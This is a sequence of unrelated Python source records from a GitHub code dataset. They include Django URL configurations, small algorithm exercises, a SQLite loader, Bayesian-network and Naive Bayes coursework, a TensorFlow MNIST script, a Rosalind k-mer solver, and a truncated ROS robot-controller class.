url(r'^feeds/(?P[-\\w]+)/(?P[-\\w]+)/$', ChannelFeed()),\n url(r'^feeds/(?P[-\\w]+)/torrent/$', ChannelFeedTorrent()),\n url(r'^feeds/collection/(?P[-\\w]+)/(?P[-\\w]+)/$', CollectionFeed()),\n url(r'^feeds/collection/(?P[-\\w]+)/torrent/$', CollectionFeedTorrent()),\n url(r'^feeds/comments/$', CommentsFeed()),\n url(r'^captcha/', include('captcha.urls')),\n url(r'^admin/', include(admin.site.urls)),\n)\n\nif \"django.contrib.admindocs\" in settings.INSTALLED_APPS:\n urlpatterns += patterns('',\n url(r'^admindocs/', include('django.contrib.admindocs.urls')),\n )\n\nif settings.DEBUG:\n urlpatterns += patterns('',\n url(r'^media/(?P.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT,\n }),\n )\n urlpatterns += patterns('django.contrib.staticfiles.views',\n url(r'^static/(?P.*)$', 'serve'),\n )\n","repo_name":"LambdaCast/LambdaCast","sub_path":"lambdaproject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"243231190","text":"from django.contrib import admin\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom django.urls import path, include, reverse_lazy\n\nfrom engine.forms import LoginForm, RegisterForm\nfrom engine.views import *\n\naccounts_urls = [\n path(\n 'login/',\n LoginView.as_view(template_name=\"login.html\", authentication_form=LoginForm),\n name='login'\n ),\n path(\n 'register/',\n CreateView.as_view(\n template_name='register.html',\n model=User,\n form_class=RegisterForm,\n success_url=reverse_lazy('main')\n ),\n name='register'\n ),\n path(\n 'logout/',\n LogoutView.as_view(template_name=\"logout.html\"),\n name='logout'\n ),\n]\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', TemplateView.as_view(template_name=\"main.html\"), name='main'),\n path('shorten/', ShortUrlView.as_view(), name='short_url'),\n path('links/', UserLinksView.as_view(), name='user_links_list'),\n path('link/', UserLinkDetailView.as_view(), name='user_link_detail'),\n path('accounts/', include(accounts_urls)),\n path('', RedirectUrlView.as_view()),\n]\n","repo_name":"briefausde/urlshorter","sub_path":"urlshorter/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"14993800403","text":"def solution(babbling):\n \n talk = [\"aya\", \"ye\", \"woo\", \"ma\"]\n answer = 0\n for i in babbling:\n for j in talk:\n if j * 2 not in i:\n i = i.replace(j, ' ')\n if i.isspace():\n answer+=1\n return answer","repo_name":"5P2RS5/Python_for_infra","sub_path":"programmers/1/133499.py","file_name":"133499.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10870587357","text":"import json\nimport sqlite3\nfrom datetime import datetime\n\n\nwith open('data/json/sample_class.json', 'r') as json_file:\n data = json.load(json_file)\n\n# Connect to the database\nconnection = sqlite3.connect('data/ATTA.sqlite')\ncursor = connection.cursor()\n\n\n# Clear the table by deleting all rows\ndelete_query = '''\n DELETE FROM country_income_group\n'''\ncursor.execute(delete_query)\n\n# Insert data into the table\ninsert_query = '''\n INSERT INTO country_income_group (economy, region, country_code2, country_code3, income_group, lending_category, etl_insert_ts, etl_update_ts)\n VALUES (?, ?, ?, ?, ?, ?, ?, ?)\n'''\n\nfor row in data:\n current_timestamp = datetime.now()\n cursor.execute(insert_query, (\n row.get(\"Economy\", None),\n row.get(\"Region\", None),\n row.get(\"country_code2\", None),\n row.get(\"Code\", None),\n row.get(\"Income Group\", None),\n row.get(\"Lending Category\", None),\n current_timestamp,\n current_timestamp\n ))\n\nconnection.commit()\nconnection.close()\n\nprint(\"Data inserted into 'country_income_group' table.\")\n\n\n","repo_name":"lorcan17/atta-data","sub_path":"src/python/archive/adhoc/insert_into_country_income_group.py","file_name":"insert_into_country_income_group.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71997428320","text":"from factor import *\nfrom factorset import *\nfrom naiveinf import *\n\ndef buildrobotex(commandfailrate,stickprob,fpr,fnr):\n\n c = discretevariable(\"c\",2)\n x0 = discretevariable(\"x0\",3)\n x1 = discretevariable(\"x1\",3)\n r0 = discretevariable(\"r0\",2)\n l0 = discretevariable(\"l0\",2)\n r1 = discretevariable(\"r1\",2)\n l1 = discretevariable(\"l1\",2)\n\n px0 = discretefactor({x0})\n px0[{x0:0}] = 1.0/3.0\n px0[{x0:1}] = 1.0/3.0\n px0[{x0:2}] = 1.0/3.0\n\n pc = discretefactor({c})\n pc[{c:0}] = 0.5\n pc[{c:1}] = 0.5\n\n px1x0c = discretefactor({x1,x0,c})\n px1x0c[{}] = 0.0 # initialize to all zeros\n for oldx in range(0,3):\n for cval in range(0,2):\n newx = oldx-1 if cval else oldx+1\n newx = min(max(newx,0),2)\n px1x0c[{x0:oldx,x1:newx,c:cval}] += 1.0-commandfailrate\n px1x0c[{x0:oldx,x1:oldx,c:cval}] += commandfailrate\n \n\n def initsensorcpd(pos,sen,walls):\n f = discretefactor({pos,sen})\n for posval in range(0,3):\n w = walls[posval]\n notw = 1-w\n errrate = fnr if w else fpr\n f[{pos:posval,sen:w}] = 1.0-errrate\n f[{pos:posval,sen:notw}] = errrate\n return f\n\n\n pr0x0 = initsensorcpd(x0,r0,[0,1,0])\n pl0x0 = initsensorcpd(x0,l0,[1,0,0])\n\n def nextsensorcpd(pos,oldsen,sen,walls):\n f = discretefactor({pos,oldsen,sen})\n f[{}] = 0.0\n for posval in range(0,3):\n for oldsenval in range(0,2):\n f[{pos:posval,oldsen:oldsenval,sen:oldsenval}] += stickprob\n w = walls[posval]\n notw = 1-w\n errrate = fnr if w else fpr\n f[{pos:posval,oldsen:oldsenval,sen:w}] += (1.0-stickprob)*(1.0-errrate)\n f[{pos:posval,oldsen:oldsenval,sen:notw}] += (1.0-stickprob)*errrate\n\n return f\n\n pr1r0x1 = nextsensorcpd(x1,r0,r1,[0,1,0])\n pl1l0x1 = nextsensorcpd(x1,l0,l1,[1,0,0])\n \n robotbn = factorset()\n robotbn.addfactor(pc)\n robotbn.addfactor(px0)\n robotbn.addfactor(px1x0c)\n robotbn.addfactor(pr0x0)\n robotbn.addfactor(pl0x0)\n robotbn.addfactor(pr1r0x1)\n robotbn.addfactor(pl1l0x1)\n \n unnorm = pc*pr0x0*pr1r0x1*pl0x0*pl1l0x1\n z = unnorm.marginalize({c,r0,r1,l0,l1})\n norm = unnorm / z\n phinew = unnorm.reduce({r0:1,l0:1,r1:1,l1:1})\n\n return robotbn,(c,x0,x1,r0,r1,l0,l1)\n\ndef buildstudentex():\n # note you will need to have g have values of 0,1,2\n # (not 1,2,3 as in the text)\n\n # remove line below when you write your code\n # it is okay just to \"hard code\" all of the values in here\n \n # will need to return your factorset (studentbn below) as the \n # variables in the order d,i,g,s,l (as below)\n \n d= discretevariable(\"d\",2)\n \n i = discretevariable(\"i\",2)\n \n g = discretevariable(\"g\",3)\n \n s = discretevariable(\"s\",2)\n \n l = discretevariable(\"l\",2)\n\n\n pd = discretefactor({d})\n pd[{d:0}] = 0.6\n pd[{d:1}] = 0.4\n\n pi = discretefactor({i})\n pi[{i:0}] = 0.7\n pi[{i:1}] = 0.3\n \n pgid=discretefactor({g,i,d})\n pgid[{g:0,i:0,d:0}]=0.3\n pgid[{g:0,i:0,d:1}]=0.005\n pgid[{g:0,i:1,d:0}]=0.9\n pgid[{g:0,i:1,d:1}]=0.5\n pgid[{g:1,i:0,d:0}]=0.4\n pgid[{g:1,i:0,d:1}]=0.25\n pgid[{g:1,i:1,d:0}]=0.08\n pgid[{g:1,i:1,d:1}]=0.3\n pgid[{g:2,i:0,d:0}]=0.3\n pgid[{g:2,i:0,d:1}]=0.7\n pgid[{g:2,i:1,d:0}]=0.002\n pgid[{g:2,i:1,d:1}]=0.2\n\n\n psi=discretefactor({s,i})\n psi[{s:0,i:0}]=0.95\n psi[{s:0,i:1}]=0.2\n psi[{s:1,i:0}]=0.05\n psi[{s:1,i:1}]=0.8\n\n plg=discretefactor({l,g})\n plg[{l:0,g:0}]=0.1\n plg[{l:0,g:1}]=0.4\n plg[{l:0,g:2}]=0.99\n plg[{l:1,g:0}]=0.9\n plg[{l:1,g:1}]=0.6\n plg[{l:1,g:2}]=0.01\n \n \n \n studentbn = factorset()\n studentbn.addfactor(pd)\n studentbn.addfactor(pi)\n studentbn.addfactor(pgid)\n studentbn.addfactor(psi)\n studentbn.addfactor(plg)\n \n \n return studentbn,(d,i,g,s,l)\n\n\n#### below is the testing code\n\ndef runrobot():\n robotex,(c,x0,x1,r0,r1,l0,l1) = buildrobotex(0.1,0.2,0.05,0.1)\n robotquery = naiveinfval(robotex,{c},{r0:1,l0:1,r1:1,l1:1})\n return (robotquery,c)\n\ndef runstudent():\n studentex,(d,i,g,s,l) = buildstudentex()\n studentquery1 = naiveinf(studentex,{i},{l,s})\n studentquery2 = naiveinfval(studentex,{s},{d:0,l:1})\n return (studentquery1,studentquery2,(d,i,g,s,l))\n\nif __name__ == '__main__':\n # note that rounding used in PS1 solutions will cause the answer to differ\n # from this one (computed without as much rounding) by a bit\n robotquery,_ = runrobot()\n print(robotquery)\n ## should return a factor where c=0 => 0.39676 and c=1 -> 0.603239\n\n\n ## it is up to you to figure out if these examples return the right values\n studentquery1,studentquery2,_ = runstudent()\n print(studentquery1)\n print(studentquery2)\n\n## you should probably write your own tests, as we will be testing your\n## code on different factorsets as well!\n## but don't put them in here, or they will mess up the automatic\n## testing -- write them on your own, but don't submit them!\n","repo_name":"kapish5467/Probabilistic-and-graphical-methods","sub_path":"ps3/testnaiveinf.py","file_name":"testnaiveinf.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"11822005326","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\n\n# the loss function we are going to use is the cross-entropy\n# the function (optimzer) we are going to use to minimize cost, \n# is Adam.\n# One epoch is equal to one feedforward cycle plus one backprop cycle.\n# a batch \n\nmnist_data = input_data.read_data_sets(\n\t\"C:/Users/ANTARTIDA/Desktop/Deep_reinforcement_learning/Basics/data\",\n\t one_hot=True)\n# this has 10 classes, being represented as one hot \n# (one pixel is on, the rest is off [1,0,0,0] for 0 out of 3.)\n# mnist dataset are images of 28x28 \n\nn_nodes = [512, 512, 256]\nn_classes = 10\nbatch_size = 100 \n# batch_size : it makes 100 feedforwards and then backprop them.\n\n# the xLabel will be a matrix (i.e. it has dimensions: \n# height and width.)\n# the second arg in xLabel placeholder is the dimensions of \n# the matrix we are going to use. \n# [None, 784] shape tells us that the input is going to be a vector\n# containing the whole image ( 28x28 = 784 ).\nshape = [None, 784]\nxLabel = tf.placeholder(tf.float32, [None, 784])\nyLabel = tf.placeholder(tf.float32)\n\ndef FFNN_model(data): # CHECK THIS FUNCTIONS, IT GIVES AN ERROR INVOLVING THE LAST LAYER\n\thidden_lays = []\n\tlayers = []\n\tfor i in range(0,len(n_nodes)+1):\n\t\tif i == 0: \n\t\t\thidden_lays.append(\n\t\t\t\t{\"weights\": tf.Variable(tf.random_normal([shape[1],\n\t\t\t\t\tn_nodes[i]])),\n\t\t\t\t \"bias\":tf.Variable(tf.ones([n_nodes[i]])), \n\t\t\t\t}\n\t\t\t)\n\t\telif i == len(n_nodes):\n\t\t\thidden_lays.append(\n\t\t\t\t{\"weights\": tf.Variable(tf.random_normal([n_nodes[i-1],\n\t\t\t\t\tn_classes])),\n\t\t\t\t \"bias\":tf.Variable(tf.ones([n_classes])), \n\t\t\t\t}\n\t\t\t)\n\t\telse:\n\t\t\thidden_lays.append(\n\t\t\t\t{\"weights\": tf.Variable(tf.random_normal([n_nodes[i-1],\n\t\t\t\t\tn_nodes[i]])),\n\t\t\t\t \"bias\":tf.Variable(tf.ones([n_nodes[i]])), \n\t\t\t\t}\n\t\t\t)\n\tfor i in range(len(hidden_lays)):\n\t\tif i == 0: \n\t\t\tlayers.append(tf.nn.relu(tf.add(tf.matmul(\n\t\t\t\tdata, hidden_lays[i][\"weights\"]), \n\t\t\t\thidden_lays[i][\"bias\"])))\n\t\telse:\n\t\t\tlayers.append(tf.nn.relu(tf.add(tf.matmul(\n\t\t\t\tlayers[i-1], hidden_lays[i][\"weights\"]), \n\t\t\t\thidden_lays[i][\"bias\"])))\n\n\treturn layers[len(layers)-1]\n\n\ndef backprop(xLabels):\n\t# the hypothesis is going to be one hot\n\thypothesis = FFNN_model(xLabels) \n\tcost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=hypothesis, labels=yLabel))\n\tno_reduce_mean_cost = tf.nn.softmax_cross_entropy_with_logits(logits=hypothesis, labels=yLabel)\n\n\toptimzer = tf.train.AdamOptimizer(0.01).minimize(cost)\n\n\tn_epochs = 50\n\n\twith tf.Session() as s:\n\t\ts.run(tf.global_variables_initializer())\n\t\tfor epoch in range(n_epochs):\n\t\t\tepoch_loss = 0\n\t\t\tfor episode in range(int(mnist_data.train.num_examples/batch_size)):\n\t\t\t\txLab, yLab = mnist_data.train.next_batch(batch_size) # chunks data for me \n\t\t\t\tepisode, cost_in_episode = s.run([optimzer, cost], feed_dict={xLabel: xLab, yLabel: yLab})\n\t\t\t\tepoch_loss += cost_in_episode\n\t\t\tprint(\"Epoch \", epoch, \"/\", n_epochs, \". Loss: \", epoch_loss)\n\n\t\tprediction = tf.equal(tf.argmax(hypothesis,1), tf.argmax(yLabel,1)) \n\t\t# remember those are onehot\n\n\t\taccuracy = tf.reduce_mean(tf.cast(prediction, \"float\"))\n\t\tprint(\"Test accuracy: \", accuracy.eval({xLabel:mnist_data.test.images, \n\t\t\tyLabel:mnist_data.test.labels}))\n\nif __name__ == '__main__':\n\tbackprop(xLabel)","repo_name":"SimplyRocketMan/Deep_reinforcement_learning","sub_path":"Basics/FFNN_TF.py","file_name":"FFNN_TF.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34193401081","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\nclass Solution:\n def swapPairs(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if not head:\n return\n node = head\n prev_node = None\n\n if head.next:\n head = head.next\n\n while node:\n node2 = node.next\n if not node2:\n return head\n node.next = node2.next\n node2.next = node\n\n if prev_node:\n prev_node.next = node2\n\n prev_node = node\n node = node.next\n\n return head\n\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\nclass Solution:\n def swapPairs(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if not head:\n return\n node = head\n\n if head.next:\n head = head.next\n node.next = self.swapPairs(head.next)\n head.next = node\n\n return head\n","repo_name":"bartlesy/algo-puzzles","sub_path":"swap_pairs.py","file_name":"swap_pairs.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28356028387","text":"'''\nauthor: Aditi Anant Munjekar\n'''\n\nimport numpy as np\nfrom scipy.stats import norm\n\ndef condprob(x, n, y, params):\n return norm.pdf(x, params[n][y]['mean'], params[n][y]['var'])\n\ndef learn(data, N, Y):\n params = {}\n for n in range(N):\n params[n] = {}\n for y in range(Y):\n params[n][y] = {}\n subset = []\n for obs in data:\n if obs[-1] == y:\n subset.append(obs[n])\n params[n][y]['mean'] = np.mean(subset)\n params[n][y]['var'] = np.var(subset)\n\n return params\n\ndef classify(obs, params, N, Y):\n ans = []\n for y in range(Y):\n prob = 1\n for n in range(N):\n prob *= condprob(obs[n], n, y, params)\n ans.append(prob)\n return ans\n\ndef majority(data):\n count, count0, count1 = 0, 0, 0\n for i in (data):\n if i[-1] == 1.0:\n count1 = count + 1\n if i[-1] == 0.0:\n count0 += 1\n count = max(count0, count1)\n print(count)\n majority = (count / len(data))*100\n return majority\n\ndef demo():\n #complete data\n data = np.array([[float(x) for x in line.strip().split(\",\")] for line in open(\"banknote.train\").readlines()])\n print('Loaded %d observations.' % len(data))\n\n num_of_folds = 3\n fold_size = int(len(data) / num_of_folds)\n\n #training data for 1st fold\n datatrain1 = data[:fold_size]#training data for 1st fold\n\n #calculating the N and Y\n N = len(datatrain1[0]) - 1\n distinct = []\n list = []\n for i in range(len(datatrain1)):\n list.append(datatrain1[i][-1])\n for j in list:\n if j not in distinct:\n distinct.append(j)\n Y = len(distinct)\n\n params = learn(datatrain1, N, Y)\n\n correct = 0\n for obs in data[fold_size:]:# testing data for 1st fold\n result = classify(obs, params, N, Y)\n result = np.array(result) / np.sum(result)\n if np.argmax(result) == obs[-1]:\n correct += 1\n accuracy1 = (correct / (len(data)-fold_size)) * 100\n print('Accuracy after 1nd fold: %.3f%%' % accuracy1)\n\n #for training 2nd fold\n datatrain2 = data[fold_size:(len(data) - fold_size)]\n\n params = learn(datatrain2, N, Y)\n\n #for testing\n correct = 0\n for obs in data[:fold_size]:#testing data for 2nd fold\n result = classify(obs, params, N, Y)\n result = np.array(result) / np.sum(result)\n if np.argmax(result) == obs[-1]:\n correct += 1\n for obs in data[2*fold_size:]:\n result = classify(obs, params, N, Y)\n result = np.array(result) / np.sum(result)\n if np.argmax(result) == obs[-1]:\n correct += 1\n\n accuracy2 = (correct/(len(data)-fold_size))*100\n print('Accuracy after 2nd fold: %.3f%%' % accuracy2)\n\n #for training for 3rd fold\n datatrain3 = data[2*fold_size:]\n\n params = learn(datatrain3, N, Y)\n\n #for testing for 3rd fold\n correct = 0\n for obs in data[:2*fold_size]:#testing data 3rd fold\n result = classify(obs, params, N, Y)\n result = np.array(result) / np.sum(result)\n if np.argmax(result) == obs[-1]:\n correct += 1\n\n accuracy3 = (correct/(len(data)-fold_size))*100\n print('Accuracy after 3nd fold: %.3f%%' % accuracy3)\n\n print('Mean is: %.3f%%'% ((accuracy1+accuracy2+accuracy3)/3))\n majority_value = majority(data)\n print('Majority baseline of dataset is: %.3f%% '% majority_value)\n\nif __name__ == '__main__':\n demo()\n\n\n\n","repo_name":"am6180/Decision-Tree-Naive-Bayes-algorithms","sub_path":"NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3126085302","text":"import math\ndef main():\n print(\"This program calculates the length of a ladder required\")\n print(\"to reach a given height while leaned against a house.\")\n print()\n print(\"Please enter the height (in m) and angle (in degrees) of the ladder.\")\n height = eval(input(\"Enter height: \"))\n angle = eval(input(\"Enter angle: \"))\n pi = 3.141592653589793\n angle_radians = (pi/180)*angle\n length = height/math.sin(angle_radians)\n\n print(\"The length of the ladder has to be\", length, \"m.\")\nmain()\n","repo_name":"lilu069/hw070172","sub_path":"L04/exercises_zelle/3_10.py","file_name":"3_10.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11961428026","text":"# Frequent Words with Mismatches and Reverse Complements Problem\n#\n# Find the most frequent k-mers (with mismatches and reverse complements) in a DNA string.\n#\n# Given: A DNA string Text as well as integers k and d.\n#\n# Return: All k-mers Pattern maximizing the sum Countd(Text, Pattern) + Countd(Text, Pattern) over all possible k-mers.\n\n# Sample Dataset\n#\n# ACGTTGCATGTCGCATGATGCATGAGAGCT\n# 4 1\n\n# Sample Output\n#\n# ATGT ACAT\n\n\nimport inout \t# my module for handling Rosalind's file I/O\nsequence = inout.infilelines[0].strip()\nk, d = map(int, inout.infilelines[1].strip().split())\n\ncomplement = { 'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A'}\ndef reverse_complement(kmer):\n\tr = ''\n\tfor base in kmer:\n\t\tr = complement[base] + r\n\treturn r\n\ndef enumerate_mismatches (kmer, maxdist):\n\tif maxdist == 0:\n\t\treturn [kmer]\n\telse:\n\t\tr = []\n\t\tfor m_kmer in enumerate_mismatches(kmer, maxdist - 1):\n\t\t\tfor loc in range(k):\n\t\t\t\tfor base in ['A', 'C', 'G', 'T']:\n\t\t\t\t\tnew_kmer = m_kmer[:loc] + base + m_kmer[loc + 1:]\n\t\t\t\t\tr.append(new_kmer)\n\t\treturn set(r)\n\nkmer_counts = {}\nmax_kmers = []\nmax_kmer_count = 0\nfor idx in range(len(sequence) - k + 1):\n\tkmer = sequence[idx:idx+k]\n\tm_kmers = list(enumerate_mismatches(kmer, d))\n\tm_kmers.extend(list(enumerate_mismatches(reverse_complement(kmer), d)))\n\tfor m_kmer in m_kmers:\n\t\tif m_kmer in kmer_counts:\n\t\t\tcount = kmer_counts[m_kmer] + 1\n\t\telse:\n\t\t\tcount = 1\n\t\tkmer_counts[m_kmer] = count\n\n\t\tif count > max_kmer_count:\n\t\t\tmax_kmer_count = count\n\t\t\tmax_kmers = [m_kmer]\n\t\telif count == max_kmer_count:\n\t\t\tmax_kmers.append(m_kmer)\n\ninout.output(' '.join(max_kmers))\n","repo_name":"jmthibault79/rosalind","sub_path":"textbook/1H.py","file_name":"1H.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"14776929908","text":"import rospy\n\nfrom tf.transformations import euler_from_quaternion\n\nfrom nav_msgs.msg import OccupancyGrid\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\nfrom geometry_msgs.msg import PoseStamped\nfrom visualization_msgs.msg import Marker\nfrom visualization_msgs.msg import MarkerArray\n\nfrom mcc.msg import *\nfrom mcc.srv import *\n\nimport math\nimport random\nimport itertools as it\nimport ctypes as ct\nimport numpy as np\n\nimport time\n\nfrom mcc_model import *\nfrom fsc import *\n\n\nMCC_OCCUPANCY_GRID_OBSTACLE_THRESHOLD = 50\nMCC_GOAL_THRESHOLD = 0.001\n\n\nclass MCCExec(object):\n \"\"\" The code which controls the robot following an MCC model's FSC. \"\"\"\n\n def __init__(self, gameType, agent, numNodes, slack):\n \"\"\" The constructor for the MCCExec class.\n\n Parameters:\n gameType -- The type of game: \"Prisoner Meeting\" or \"Battle Meeting\".\n agent -- The unique agent name from the MCC.\n numNodes -- The number of controller nodes.\n slack -- The amount of slack.\n \"\"\"\n\n # The MCC and other related information. Note: These are for *this* agent.\n self.mcc = MCC(gameType)\n self.fsc = None\n self.fscState = None\n self.agent = agent\n\n self.numNodes = numNodes\n self.slack = slack\n\n self.algorithmIsInitialized = False\n\n # Information about the map for use by a path follower once our paths are published.\n self.mapWidth = 0\n self.mapHeight = 0\n self.mapOriginX = 0.0\n self.mapOriginY = 0.0\n self.mapResolution = 1.0\n\n # This is the number of x and y states that will be created using the map. Obstacle states\n # will, of course, be omitted.\n self.gridWidth = rospy.get_param(rospy.search_param('grid_width'))\n self.gridHeight = rospy.get_param(rospy.search_param('grid_height'))\n\n # Store if we performed the initial theta adjustment and the final goal theta adjustment\n self.performedInitialPoseAdjustment = False\n self.initialPoseAdjustmentTheta = 0.0\n\n # Subscribers, publishers, services, etc. for ROS messages.\n self.subOccupancyGrid = None\n self.subMapPoseEstimate = None\n self.subMapNavGoal = None\n\n self.occupancyGridMsg = None\n self.mapPoseEstimateMsg = None\n self.mapNavGoalMsg = None\n\n self.pubModelUpdate = None\n self.srvGetAction = None\n self.srvGetFSCState = None\n self.srvUpdateFSC = None\n\n def __del__(self):\n \"\"\" The deconstructor for the MCCExec class. \"\"\"\n\n if self.algorithmIsInitialized:\n self.uninitializeAlgorithm()\n\n def initialize(self):\n \"\"\" Initialize the MCCExec class, mainly registering subscribers and services. \"\"\"\n\n subOccupancyGridTopic = rospy.get_param(rospy.search_param('sub_occupancy_grid'))\n self.subOccupancyGrid = rospy.Subscriber(subOccupancyGridTopic,\n OccupancyGrid,\n self.sub_occupancy_grid)\n\n subMapPoseEstimateTopic = rospy.get_param(rospy.search_param('sub_map_pose_estimate'))\n self.subMapPoseEstimate = rospy.Subscriber(subMapPoseEstimateTopic,\n PoseWithCovarianceStamped,\n self.sub_map_pose_estimate)\n\n subMapNavGoalTopic = rospy.get_param(rospy.search_param('sub_map_nav_goal'))\n self.subMapNavGoal = rospy.Subscriber(subMapNavGoalTopic,\n PoseStamped,\n self.sub_map_nav_goal)\n\n pubModelUpdateTopic = rospy.get_param(rospy.search_param('model_update'))\n self.pubModelUpdate = rospy.Publisher(pubModelUpdateTopic, ModelUpdate, queue_size=10)\n\n srvGetActionTopic = rospy.get_param(rospy.search_param('get_action'))\n self.srvGetAction = rospy.Service(srvGetActionTopic,\n GetAction,\n self.srv_get_action)\n\n srvGetFSCStateTopic = rospy.get_param(rospy.search_param('get_fsc_state'))\n self.srvGetFSCState = rospy.Service(srvGetFSCStateTopic,\n GetFSCState,\n self.srv_get_fsc_state)\n\n srvUpdateFSCTopic = rospy.get_param(rospy.search_param('update_fsc'))\n self.srvUpdateFSC = rospy.Service(srvUpdateFSCTopic,\n UpdateFSC,\n self.srv_update_fsc)\n\n def update(self):\n \"\"\" Update the MCCExec object. \"\"\"\n\n # These methods deal with the threading issue. Basically, the update below could be called\n # while the MCC itself is being modified in a different thread. This can easily be reproduced\n # by continually assigning new initial pose estimates and goals. Instead, however, we have\n # any subscriber callbacks assign a variable with the message. This message is then handled\n # as part of the main node's thread update call (here).\n self.handle_occupancy_grid_message()\n self.handle_map_pose_estimate_msg()\n self.handle_map_nav_goal_msg()\n\n # We only update once we have a valid MCC.\n if self.mcc is None or self.fscState is None:\n return\n\n # If this is the first time the MCC has been ready to be updated, then\n # initialize necessary variables.\n if not self.algorithmIsInitialized:\n self.initialize_algorithm()\n\n #rospy.loginfo(\"Info[MCCExec.update]: Updating the policy.\")\n\n # Note: There is no update anymore. It is solved offline...\n #result = self.mcc.update()\n\n def initialize_algorithm(self):\n \"\"\" Initialize the MCC algorithm. \"\"\"\n\n if self.algorithmIsInitialized:\n rospy.logwarn(\"Warn[MCCExec.initialize_algorithm]: Algorithm is already initialized.\")\n return\n\n rospy.loginfo(\"Info[MCCExec.initialize_algorithm]: Initializing the algorithm.\")\n\n # Load the policy once the initial pose of the agent is prepared.\n self.fsc = FSC(self.mcc, self.agent, self.numNodes)\n self.fsc.load(\"%i_%i\" % (self.numNodes, self.slack))\n self.fscState = self.fsc.get_initial_state()\n\n self.algorithmIsInitialized = True\n\n def uninitialize_algorithm(self):\n \"\"\" Uninitialize the MCC algorithm. \"\"\"\n\n if not self.algorithmIsInitialized:\n rospy.logwarn(\"Warn[MCCExec.uninitialize_algorithm]: Algorithm has not been initialized.\")\n return\n\n rospy.loginfo(\"Info[MCCExec.uninitialize_algorithm]: Uninitializing the algorithm.\")\n\n self.fsc = None\n self.fscState = None\n\n self.algorithmIsInitialized = False\n\n def sub_occupancy_grid(self, msg):\n \"\"\" A subscriber for OccupancyGrid messages. This converges any 2d map\n into a set of MCC states. This is a static method to work as a ROS callback.\n\n Parameters:\n msg -- The OccupancyGrid message data.\n \"\"\"\n\n if self.occupancyGridMsg is None:\n self.occupancyGridMsg = msg\n\n def handle_occupancy_grid_message(self):\n \"\"\" A handler for OccupancyGrid messages. This converges any 2d map\n into a set of MCC states. This is a static method to work as a ROS callback.\n \"\"\"\n\n if self.occupancyGridMsg is None:\n return\n msg = self.occupancyGridMsg\n\n rospy.loginfo(\"Info[MCCExec.sub_occupancy_grid]: Received map. Creating a new MCC.\")\n\n # Remember map information.\n self.mapWidth = msg.info.width\n self.mapHeight = msg.info.height\n self.mapOriginX = msg.info.origin.position.x\n self.mapOriginY = msg.info.origin.position.y\n self.mapResolution = msg.info.resolution\n\n xStep = int(self.mapWidth / self.gridWidth)\n yStep = int(self.mapHeight / self.gridHeight)\n\n # Un-/Re-initialize other helpful variables.\n if self.algorithmIsInitialized:\n self.uninitialize_algorithm()\n\n self.occupancyGridMsg = None\n\n self.pubModelUpdate.publish(ModelUpdate())\n\n def sub_map_pose_estimate(self, msg):\n \"\"\" A subscriber for PoseWithCovarianceStamped messages. This is when an initial\n pose is assigned, inducing an initial FSC State. This is a static method to work as a\n ROS callback.\n\n Parameters:\n msg -- The PoseWithCovarianceStamped message data.\n \"\"\"\n\n if self.mapPoseEstimateMsg is None:\n self.mapPoseEstimateMsg = msg\n\n def handle_map_pose_estimate_msg(self):\n \"\"\" A handler for PoseWithCovarianceStamped messages. This is when an initial\n pose is assigned, inducing an initial FSC state. This is a static method to work as a\n ROS callback.\n \"\"\"\n\n if self.mapPoseEstimateMsg is None:\n return\n msg = self.mapPoseEstimateMsg\n\n if self.mcc is None:\n rospy.logwarn(\"Warn[MCCExec.sub_map_pose_estimate]: MCC has not yet been defined.\")\n return\n\n rospy.loginfo(\"Info[MCCExec.sub_map_pose_estimate]: Received pose estimate. Assigning MCC initial FSC state.\")\n\n # Setup the initial (theta) pose adjustment.\n roll, pitch, yaw = euler_from_quaternion([msg.pose.pose.orientation.x,\n msg.pose.pose.orientation.y,\n msg.pose.pose.orientation.z,\n msg.pose.pose.orientation.w])\n self.initialPoseAdjustmentTheta = -yaw\n\n self.performedInitialPoseAdjustment = False\n\n self.uninitialize_algorithm()\n self.initialize_algorithm()\n\n self.mapPoseEstimateMsg = None\n\n self.pubModelUpdate.publish(ModelUpdate())\n\n def sub_map_nav_goal(self, msg):\n \"\"\" A subscriber for PoseStamped messages. This is called when a goal is provided,\n assigning the rewards for the MCC. This is a static method to work as a 